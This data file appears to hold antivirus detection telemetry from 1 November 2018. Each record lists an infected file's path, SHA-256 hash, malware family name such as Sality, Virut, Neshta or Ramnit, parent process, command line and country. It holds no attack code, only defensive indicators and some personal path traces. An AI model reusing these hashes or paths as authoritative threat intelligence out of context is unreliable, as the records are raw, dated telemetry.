  Row(detection=Row(filename='sumatrapdfsetup.exe', filepath='D:\\ADEL 010116\\Adel_old\\old 27-08-2014\\My Documents\\Downloads\\old\\SumatraPDFSetup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='8880a07b15ded53364747db66afca615da6251894f52c506c9c6a8c7cc26a03c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:36:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กิจกรรมลูกเสือ บคว 53-54.exe', filepath='E:\\picture\\กิจกรรมลูกเสือ บคว 53-54\\กิจกรรมลูกเสือ บคว 53-54.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='88bfa11cb1bfe7ecc18e86cfa597b4bbfb27f24b9be42b692e98a80d5aa0eec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kur.exe', filepath='c:\\users\\X\\desktop\\kur.exe', filesize=384000, name='SPR/Silentall.88e5b8.#M1.#R1'), hash='88e5b88fe0995658a8c99f218b42050f370377c321dd1a36635a9495e7aab5ea', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T10:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='88fae1e96a3a50e4887019be679f02427f6fcc329aeec819120eb69c0a24592c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\88FAE1E96A3A50E4887019BE679F02427F6FCC329AEEC819120EB69C0A24592C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='88fae1e96a3a50e4887019be679f02427f6fcc329aeec819120eb69c0a24592c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='makecert.exe', filepath='\\\\?\\F:\\Autocad2008\\x64\\support\\VBA\\pFiles\\MSOffice\\Office10\\makecert.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='8903af62a5cb519c66b7a3e6a650180a0a37ba9418a1ac111d65f2c4f86a2fba', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:18:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Lsj5Z1BTu0u5hzcw.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T17:33:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='--engine=2 --session-id=8YsoEh9XPV4LLlyuyfzuOr+VsXK2bOIfuptUHBMo --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T19:07:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fd03b3fc-1925-282d-e6bd-44da874af9b8.exe', filepath='G:\\{c076a476-0b0d-080f-3499-781bddedba62}\\fd03b3fc-1925-282d-e6bd-44da874af9b8.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='8935de910fb2c7986cef25e88d51a8ddc7c5a3b3f91676ec30030f71682d825d', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1736704, timestamp='2018-11-01T14:16:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvlruic.exe', filepath='C:\\ProgramData\\msvlruic.exe', filesize=75360000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='89bcffc47c2666a12606e123b04c95de9dd3a61cf7d8cab0dfac956dc6796356', metadata=Row(cmdline='--engine=2 --session-id=3bTAG96ZOM7x7\\\\\\/HeLwEiGpThYE33uOblW\\\\\\/CeDG07 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-01T01:50:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T20:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T16:20:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='8a0b5ce8efce35074a98166f29b454194d3ac777765af760041a8c0875aa5a2c', metadata=Row(cmdline='-k BitStreamingDrv', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:01:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ترتيب الحروف.exe', filepath='\\\\?\\K:\\العاب فلاش\\ترتيب الحروف.exe', filesize=672000, name='W32/Neshta.A.#M1.#R1'), hash='8a254f061d8ecc5015f96bfd159fce908d3a097713f78e1f200bb20c0d05f193', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PRO1000\\Win32\\NDIS61\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='8a753fd74b70f884bc18915fd6ad16488c5ef7ee0adab0c84fcc9f41d9365ea2', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-01T03:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='typeperf.exe', filepath='\\?\\H:\\WINDOWS\\system32\\typeperf.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8ab0dd7a29c6fa0b1d3ad136649a25294faaf0277fc72cbcf63572b84002a0bd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='testauth.exe', filepath='E:\\UltraVNC\\testauth.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='8aba7af9312e1f278c946235fbfdb89749da657c06b28cf97ed34ffca33f2081', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502352, timestamp='2018-11-01T14:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='8acf2ce432951634892ce92246588865acda8902c2a932281141081b1158fc8d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tarbawy1.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa9620.34606\\tarbawy\\Tarbawy1.exe', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\tarbawy1.zip\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2219736, timestamp='2018-11-01T11:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-133729-060694cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a1bd64e\\AVSCAN-20181101-133632-FF56D982\\AVSCAN-20181101-133729-060694CB', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sitemap.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\sitemap.html', filesize=648000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='8b01b51a2d2391ce51d1d8014d9a25d7848b3772fac26bceb5d58944f9ebea02', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:53:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igdrcl32.dll', filepath='\\\\?\\C:\\Drivers\\Video\\Intel1\\HD1\\igdrcl32.dll', filesize=29632000, name='W32/Ramnit.CD.#M1.#R1'), hash='8b3047d92902ae2bfbf739fd19590f8762ee1deea944db21506d6520e3961d0a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gvgsetup_dbg.exe', filepath='F:\\FGOLD\\Huawei_Hisilicon_DRIVER\\Huawei_Hisilicon_DRIVER\\2_for some cases\\WMC_comneon2_3.46.0\\_disk\\gvgsetup_dbg.exe', filesize=932000, name='W32/Sality.AG.#M1.#R1'), hash='8c05618fe9b7a39723ac2dd52b936902891561575927f0b95a871bfce268bde1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T16:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='funnyvoice.exe', filepath='\\\\?\\K:\\العاب فلاش\\funnyvoice.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8c222d3646ee2e259bff6e961f68d2821cda9804055e61d828ae0d699fd270d2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0006958.exe', filepath='\\\\?\\K:\\System Volume Information\\_restore{5C5E2F10-B8E0-4A14-BDD0-47C56E2C74BA}\\RP3\\A0006958.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8c222d3646ee2e259bff6e961f68d2821cda9804055e61d828ae0d699fd270d2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patch.exe', filepath='C:\\Program Files\\epsilon net\\Taxsystem\\patch.exe', filesize=167712000, name='TR/Dropper.Gen.#M300.#R3538'), hash='8c230a8f2554c5627b462627d43cda7418599e7b0b93b83f6e8e03975cf519cf', metadata=Row(cmdline='invagent.dll,RunUpdate', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8c2b4b1d2aa59333c01e93832a633661ec970bd77b3a82002407850b5b561081', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8C2B4B1D2AA59333C01E93832A633661EC970BD77B3A82002407850B5B561081', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8c2b4b1d2aa59333c01e93832a633661ec970bd77b3a82002407850b5b561081', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='\\\\\\/F \\\\\\/T \\\\\\/R', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wbem\\WMIADAP.exe', parentsize=115200, timestamp='2018-11-01T10:11:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='run-chess_bot_licensed_080.exe', filepath='c:\\users\\X\\documents\\chessbot v0.80\\run-chess_bot_licensed_080.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='8c93d30360cf904d1d080c069a0de255e9ef173016b5c6dacd070e7fc6d4ac9a', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T15:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102428-9ff4f9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_020258d0\\AVSCAN-20181101-102348-9BDBB77F\\AVSCAN-20181101-102428-9FF4F9E3', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:24:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='remote.exe', filepath='C:\\Users\\X\\Documents\\Steam\\CODEX\\626610\\remote\\remote.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDAwNTQ=\\Version_3_2_1_48\\Profiles\\Profiles.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='temp.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDAwNTQ=\\Version_3_2_1_48\\Temp\\Temp.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='626610.scr', filepath='C:\\Users\\X\\Documents\\Steam\\CODEX\\626610\\626610.scr', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102414-9e836173', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_020258d0\\AVSCAN-20181101-102348-9BDBB77F\\AVSCAN-20181101-102414-9E836173', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='justcloud.exe', filepath='C:\\Program Files\\JustCloud\\JustCloud.exe', filesize=1020000, name='TR/Trash.Gen.#M1.#R1'), hash='8d4654117e8a87ec07359af4c13f8210c7bb68f12dda60366d712c1b17ba5c38', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:06:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='collect2.exe', filepath='C:\\Program Files (x86)\\CodeBlocks\\MinGW\\libexec\\gcc\\mingw32\\5.1.0\\collect2.exe', filesize=512000, name='W32/Neshta.A.#M1.#R1'), hash='8deea902fa6e72b14cc54d60270f6119720aa4512f2dc898cebf0de4c0f8897e', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='collect2.exe', filepath='\\\\?\\C:\\Program Files (x86)\\CodeBlocks\\MinGW\\libexec\\gcc\\mingw32\\5.1.0\\collect2.exe', filesize=512000, name='W32/Neshta.A.#M1.#R1'), hash='8deea902fa6e72b14cc54d60270f6119720aa4512f2dc898cebf0de4c0f8897e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183153-468e6659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183153-468E6659', filesize=64000, name='VBA/Dldr.Agent.futat.#M1.#R1'), hash='8e0a02d2cf2f68a446cf6360b746631e4cc17e7db282d55b47e6a5fa279f734d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rwafj2r', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RWAFJ2R', filesize=64000, name='VBA/Dldr.Agent.futat.#M1.#R1'), hash='8e0a02d2cf2f68a446cf6360b746631e4cc17e7db282d55b47e6a5fa279f734d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bomberic2.exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\Bomberic2.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8e50f043a7eab445b4586e06a5e3dfde4692082979fcfe1fae86675122a15553', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='C:\\Program Files\\Common Files\\TTKN\\Bin\\libeay32.dll', filesize=1216000, name='W32/Ramnit.CD.#M1.#R1'), hash='8eb80279e5e95160846621869a01d51797c9f16cd6b5fa8b30390cdcef48f6d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T11:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='\\\\?\\C:\\Program Files\\Common Files\\TTKN\\Bin\\libeay32.dll', filesize=1216000, name='W32/Ramnit.CD.#M1.#R1'), hash='8eb80279e5e95160846621869a01d51797c9f16cd6b5fa8b30390cdcef48f6d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:08Z'), dt=datetime.date(2018, 11, 1)),
